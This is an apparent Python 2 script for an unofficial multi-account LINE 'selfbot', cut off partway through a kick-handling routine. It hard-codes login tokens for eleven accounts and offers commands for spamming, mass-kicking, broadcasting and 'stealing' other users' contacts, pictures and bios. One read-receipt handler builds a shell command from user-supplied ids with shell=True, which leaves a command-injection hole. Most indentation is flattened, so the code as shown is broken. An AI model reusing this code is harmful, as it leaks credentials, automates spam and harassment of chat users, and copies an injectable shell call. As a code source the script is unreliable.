# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,tempfile,glob,shutil,unicodedata,goslate
from gtts import gTTS
cl = LINETCR.LINE() #Luffy
#cl.login(qr=True)
cl.login(token="ENB5GnSlVPfo9yxePnEc.za3+ZjFkdwx4tkMsS55p3a.pNBX3G5BOskb1p7uZ6ccnLX4v02ffs6SJVOtZpwo7Js=")
cl.loginResult()
ki = LINETCR.LINE() #Zorro
#ki.login(qr=True)
ki.login(token="EN7yezBSHf6rbeWX2DQb.O3gM/8W+lhDUWsy/dxrCUW./KqENZGdbS6jCXL9/csYrDiWx+atsUI9TNtDYNA42T8=")
ki.loginResult()
kk = LINETCR.LINE() #Sanji
#kk.login(qr=True)
kk.login(token="ENmK4EkDyqBeUyPVF1Y1.6dg+OADJcZqj0Eao0Y02iq.kAii+yvI/OT0HP5+SE7Yboww5TJh0jjyTdpRw2nIyI8=")
kk.loginResult()
kc = LINETCR.LINE() #Ussop
#kc.login(qr=True)
kc.login(token="EN8afrJ1bAco3yx1mJ02.ooURt8DAWMpy+5vsoJ0JqG.lAHw9ZL6nYKFlA0o+DWMJBahIvKLG9MYYLY8+dv9h/g=")
kc.loginResult()
ks = LINETCR.LINE() #Chooper
#ks.login(qr=True)
ks.login(token="EN2H3QkUsShdDYCz5mOb.prRZLwJqPCmMfE5IXSxJAW.8MD1eUxBFdPTQF6IlMYOdOxQYBfz7e51y4Z5byxRRR0=")
ks.loginResult()
k1 = LINETCR.LINE() #nami
#k1.login(qr=True)
k1.login(token="ENYo3GuxdzKqrEyMWlac.3eFmkgPriPKsRz7omolaVa.CjYzVK6jVKLI7OslFoxbVSbm9L7Soh/mZtWeUC8Emfs=")
k1.loginResult()
k2 = LINETCR.LINE() #nico robin
#k2.login(qr=True)
k2.login(token="END2YaEUCtQ7Lp02c1S0.TQuvGUe+OXXocehvIoIIKa.jPdpXVwhy0SduXaEchNc7z+leeXcatvTXYl+1hy34WE=")
k2.loginResult()
k3 = LINETCR.LINE() #
#k3.login(qr=True)
k3.login(token="ENgSKEEFgfrmdnFGQbQa.DXFKn4YysjJz53/2ow+nkG.rdT6PiLioXS9sbX0RwSgOWV1xic36CJfhWDFysU5XNg=")
k3.loginResult()
k4 = LINETCR.LINE() #
#k4.login(qr=True)
k4.login(token="ENEyxoOBd5NcSVZHPfJc.89ygu6799+QVSkkKJ8FV+a.WpjE+Bgn3covmnYUVSFOPOh4jKwjSzOrC8hqIcLt4aE=")
k4.loginResult()
k5 = LINETCR.LINE() #
#k5.login(qr=True)
k5.login(token="ENChfNjjbHdI2L0h2nEe.DPb0VWc+lxIi+i5T4WVCBG.ExWDQFfT+AmSUv+hsJ1xGzk9uHxiga9D0tJpYdKviBo=")
k5.loginResult()
satpam = LINETCR.LINE() #
satpam.login(token="ENED2zeV1FiQ0augucc8.+Es3tzQcdLmg7lYXW5GFIa.o2hzijbEnTrLNeA0nAbIKkMFyfHGWXt4Q/ZH41d1xGg=") #satpam
#satpam.login(qr=True)
satpam.loginResult()
print ("login success bos")
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""✰ 𝐹𝒶𝓃𝓉𝒶𝓈𝓎𝒮𝓉𝓊𝒹𝒾𝑜 ɮօt ✰
Creator: 幻想工作室 (FantasyStudio)
-----------------------
-=♦·Self-Service Menu·♦=-
[•]Help
[•]Key
[•]Mimin/Min
[•]Creator
[•]Time
[•]Say....
[•]Wkwkwk/Wkwk/Wk/wkwkwk/wkwk/wk
[•]Hehehe/Hehe/He/hehehe/hehe/he
[•]Galau
[•]You
[•]Hadeuh
[•]Please
[•]Haaa
[•]Lol
[•]Hmmm/Hmm/Hm/hmmm/hmm/hm
[•]Welcome
[•]Woy
[•]wiki
[•]lyric
[•]instagram
[•]music
[•]youtube
[•]Vidio
[•]Bc
[•]Up
[•]Berapa besar cinta
[•]Apakah
[•]Siapakah cewek
[•]Siapakah cowok
[•]Adakah
[•]Cakepkah
[•]T-eng
[•]T-japan
[•]T-thai
[•]T-id
-------=====---------
✰ 𝐹𝒶𝓃𝓉𝒶𝓈𝓎𝒮𝓉𝓊𝒹𝒾𝑜 ɮօt✰
-------=====---------
"""
Keyowner =""" ✰ 𝐹𝒶𝓃𝓉𝒶𝓈𝓎𝒮𝓉𝓊𝒹𝒾𝑜 ɮօt✰
Owner : 幻想工作室 (FantasyStudio)
-----=====------------
-=♦·Creator-Only Menu·=-
[•]Kick ...
[•]Invite (by mid)
[•]Undang (invite user by contact)
[•]Adminlist
[•]Bot Add @
[•]Spam... (e.g. Spam on 10 test)
[•]Bot? (check the bot contacts)
[•]Cancel (cancel pending invitations)
[•]clean invites
[•]clear invites
[•]Message change:...
[•]Message add:...
[•]Message
[•]Comment:...
[•]Add comment:...
[•]Jam on/off
[•]Change clock
[•]Jam Update
[•]Status (check room status)
[•]Sider
[•]Intip
[•]Ciduk
[•]Nk
[•]Hajar
[•]Vkick
[•]Assalammualaikum/Halo
[•]Kill
[•]Absen/Respon
[•]ifconfig
[•]system
[•]cpu
[•]kernel
[•]Debug speed
[•]Bot speed
[•]Speed respon
[•]Kurangin
[•]Rusakin
[•]Tambah
[•]Spbot
[•]Sp asl
[•]Speedbot
[•]Speed
-------=====-------
✰ ✰ 𝐹𝒶𝓃𝓉𝒶𝓈𝓎𝒮𝓉𝓊𝒹𝒾𝑜 ɮօt ✰ ✰
-----====----------
"""
Setgroup =""" -=✰ 𝐹𝒶𝓃𝓉𝒶𝓈𝓎𝒮𝓉𝓊𝒹𝒾𝑜 ɮօt ✰=-
-==♦·Admin-Only Menu·♦==-
------=====---------
[•]Cancel
[•]Buka qr/Open qr
[•]link open
[•]Tutup qr/Close qr
[•]link close
[•]Rejectall (reject all invites)
[•]Protect:hight/low
[•]Auto blockqr:off/on
[•]Namelock:on/off
[•]Blockinvite:on/off
[•]Joinn on/off (kick protect join)
[•]Cancel on/off (cancel all invitations)
[•]Qr on/off (protect qr)
[•]Contact On/off
[•]Join on/off (auto join bot)
[•]Gcancel:on/off (group invites)
[•]Leave on/off
[•]Share on/off
[•]Add on/off
[•]Cancelall (cancel all invites)
[•]Comment off/on
[•]Backup:on/off
[•]Info Group
[•]ginfo
[•]Group id
[•]TL:....
[•]Gn
[•]LG
[•]LG2
[•]group list
[•]My mid
[•]Mid Bot
[•]Bot restart
[•]Turn off bots
[•]Allbio: (change the bots' status message)
[•]Myname: (change the bots' display name)
[•]Banlist
[•]Cek ban
[•]Kill ban
[•]Blacklist @
[•]Banned @
[•]Mid @
[•]Unban @
[•]Ban
[•]Unban
[•]Steal group pict
[•]Steal cover @
[•]Midpict:..
[•]Steal pict
[•]Steal bio
[•]Steal mid
[•]Steal contact
[•]Mimic on/off
[•]Targetlist
[•]Mimic target
[•]Target @
[•]Del target @
[•]copy @
[•]Backup
[•]Spamcontact @
[•]GBc
[•]Pm cast
[•]Bot like
[•]Join/Masuk
[•]Bye all
[•]Pulang
[•]Bot pulang
[•]Anu:
[•]Invite me
[•]Remove all chat
[•]Admin add @ (by tag)
[•]Admin remove @
[•]Cleanse
[•]Sikat
[•]Greet
-==✰ 𝐹𝒶𝓃𝓉𝒶𝓈𝓎𝒮𝓉𝓊𝒹𝒾𝑜 ɮօt ✰==-
Created by: https://line.me/ti/p/abc8806191
----=====-----------
"""
KAC=[cl,ki,kk,kc,ks,k1,k2,k3,k4,k5]
DEF=[ki,kk,kc,ks,k1,k2,k3,k4,k5]
mid = cl.getProfile().mid        # "u640dffcc97ca0d65f84ca992b39e4fdc"
Amid = ki.getProfile().mid       # "ua371a6fbcc3f2c776ec1263e0d745cbb"
Bmid = kk.getProfile().mid       # "ue831bfa1a7630b3409d1e00ed32d3621"
Cmid = kc.getProfile().mid       # "u38ebab4fc75ac263d8ff95523a3d2342"
Dmid = ks.getProfile().mid       # "u3d1af39568d0a5c32615ee62c6c5e36b"
Emid = k1.getProfile().mid       # "udc47cc286a51229912ad9ece30e2c0bc"
Fmid = k2.getProfile().mid       # "ub6a51582e13fa31c4e0841d588e8a290"
Gmid = k3.getProfile().mid       # "u7717e4378c984898d9e77fb6396fcd2a"
Hmid = k4.getProfile().mid       # "uf3d60653aefdf7faafb0a2a48fc7effc"
Imid = k5.getProfile().mid       # "u769074bf00bf2d7888fc8e6de30bdc6e"
Smid = satpam.getProfile().mid   # "ufde4b74d9a820e5306ecbcb1c3981f88"
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid]
induk=["ub6f9d53713c5869f0d78e71febe13837"]
Creator=["ub6f9d53713c5869f0d78e71febe13837"]
admin=["ub6f9d53713c5869f0d78e71febe13837"]
owner=["ub6f9d53713c5869f0d78e71febe13837"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"тerima Kasih Sudah Menambahkan Aku kak",
"lang":"JP",
"comment":"👉ąµţ๏ℓɨЌ€ By😊\nBabang-adhi",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"Protectgr":True,
"qr":True,
"Backup":False,
"AutoKick":True,
"Mimic":True,
"Protectjoin":False, # Ga Kepake(Yang Gabung langsung di kick :D) Udah Udah ada Protect Cancell
"Protectcancl":True,
"protectionOn":True,
"winvite":False,
"pname":{},
"pro_name":{},
"atjointicket":True
}
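# wait: global feature flags and runtime state for the protection and auto-reply features.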
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
wait3 = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = wait2['setTime']
# Snapshot each client's current profile fields (displayName, statusMessage, pictureStatus).
for client in KAC:
    contact = client.getProfile()
    backup = client.getProfile()
    backup.displayName = contact.displayName
    backup.statusMessage = contact.statusMessage
    backup.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
'''
Upload an image to Imgur via an imgurpython client (image_path and album are expected as globals set by the caller).
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
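# yt(query): scrape YouTube search results with BeautifulSoup and return a list of youtu.be links.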
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print ("[Command] Tag All")
try:
cl.sendMessage(msg)
except Exception as error:
print (error)
def mention2(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print ("[Command] Tag All")
try:
cl.sendMessage(msg)
except Exception as error:
print (error)
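# The helpers below (sendMessage, sendText, sendImage, sendImageWithURL, post_content) are written as methods and expect to be bound to a LINETCR.LINE client instance.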
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
    path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
        with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise (e)
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print (error)
print ("\n\nRECEIVE_MESSAGE\n\n")
return
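# bot(op): main operation dispatcher - group protection, invite/kick handling, and chat commands.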
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 55:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += '\n ☞ ' + Name
wait2['ROM'][op.param1][op.param2] = '☞ ' + Name
else:
pass
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・ " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・ " + Name
                        wait2['setTime'][op.param1] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
pass
except:
pass
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = k1.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
k1.updateGroup(G)
except:
pass
                    if op.param2 in Bots or op.param2 in admin:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
k1.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
                    if op.param2 in Bots or op.param2 in admin:
                        pass
else:
try:
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
cl.kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
                if op.param2 in Bots or op.param2 in admin:
                    pass
else:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "Mau Ngundang Siapa Ka?")
#------Cancel Invite User Finish------#
#--------------------END_OF_OPERATION--------------------
if op.type == 0:
return
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------NOTIFIED_INVITE_INTO_ROOM-------------
if op.type == 22:
cl.leaveRoom(op.param1)
#--------------------INVITE_INTO_ROOM--------------------
if op.type == 21:
cl.leaveRoom(op.param1)
#--------------NOTIFIED_INVITE_INTO_GROUP----------------
if op.type == 13:
print op.param3
            # Map each bot account's mid to its client so invitations can be matched generically.
            clientByMid = {mid: cl, Amid: ki, Bmid: kk, Cmid: kc, Dmid: ks,
                           Emid: k1, Fmid: k2, Gmid: k3, Hmid: k4, Imid: k5}
            # A bot invited by the Creator accepts automatically.
            for botMid, client in clientByMid.items():
                if op.param3 in botMid and op.param2 in Creator:
                    client.acceptGroupInvitation(op.param1)
            #--------------------------------------------------------
            # A bot invited by any of the other bots also accepts.
            for botMid, client in clientByMid.items():
                if op.param3 in botMid and any(op.param2 in other for other in clientByMid if other != botMid):
                    client.acceptGroupInvitation(op.param1)
#--------------------------------------------------------
        if op.type == 13:
            # Auto-join: accept invitations that come from another bot or an admin, reject the rest.
            for botMid, client in [(mid, cl), (Amid, ki), (Bmid, kk), (Cmid, kc), (Dmid, ks)]:
                if botMid in op.param3:
                    if wait["autoJoin"] == True:
                        if op.param2 in Bots or op.param2 in admin:
                            client.acceptGroupInvitation(op.param1)
                        else:
                            client.rejectGroupInvitation(op.param1)
                    else:
                        print "autoJoin is Off"
#------------------NOTIFIED_KICKOUT_FROM_GROUP-----------------
if op.type == 19:
if wait["AutoKick"] == True:
try:
if op.param3 in Bots:
pass
if op.param2 in Bots:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
kk.inviteIntoGroup(op.param1,[op.param3])
except:
try:
if op.param2 not in Bots:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
else:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
else:
pass
#-----------------------------------------------------------------
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
ks.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ti = ks.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
k1.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k1.getGroup(op.param1)
G.preventJoinByTicket = False
k1.updateGroup(G)
Ti = k1.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = ks.getGroup(op.param1)
X.preventJoinByTicket = True
ks.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
k2.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = k2.getGroup(op.param1)
G.preventJoinByTicket = False
k2.updateGroup(G)
Ti = k2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
k1.acceptGroupInvitationByTicket(op.param1,Ti)
k2.acceptGroupInvitationByTicket(op.param1,Ti)
k3.acceptGroupInvitationByTicket(op.param1,Ti)
k4.acceptGroupInvitationByTicket(op.param1,Ti)
k5.acceptGroupInvitationByTicket(op.param1,Ti)
X = k1.getGroup(op.param1)
X.preventJoinByTicket = True
k1.updateGroup(X)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Fmid in op.param3:
if op.param2 in Bots:
pass
try:
k3.kickoutFromGroup(op.param1,[op.param2])
k2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
